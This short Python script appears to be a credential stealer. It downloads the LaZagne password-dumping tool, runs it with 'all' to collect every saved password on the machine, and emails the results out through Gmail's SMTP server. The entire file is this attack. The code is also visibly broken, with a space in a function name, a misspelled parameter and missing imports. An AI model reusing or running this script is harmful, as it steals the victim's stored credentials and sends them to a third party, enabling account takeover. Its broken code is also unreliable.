#!usr/bin/env python

def download(url):
    get_response = requests.get(url)
    file_name=url.split("/")[-1]
    with open(file_name,"wb") as out_file:
         out_file.write(get_response.content)


def send mail(emial,password,message):
    server=smtplib.SMTP("smtp.gmail.com",587)
    server.starttls()
    server.login(email,password)
    server.sendmail(email,email,message)
    server.quit()

download("<Lazagne file link>")
result=subprocess.check_output("lazagne.exe all",shell=True)
send_mail("mail Id", "Password", result)
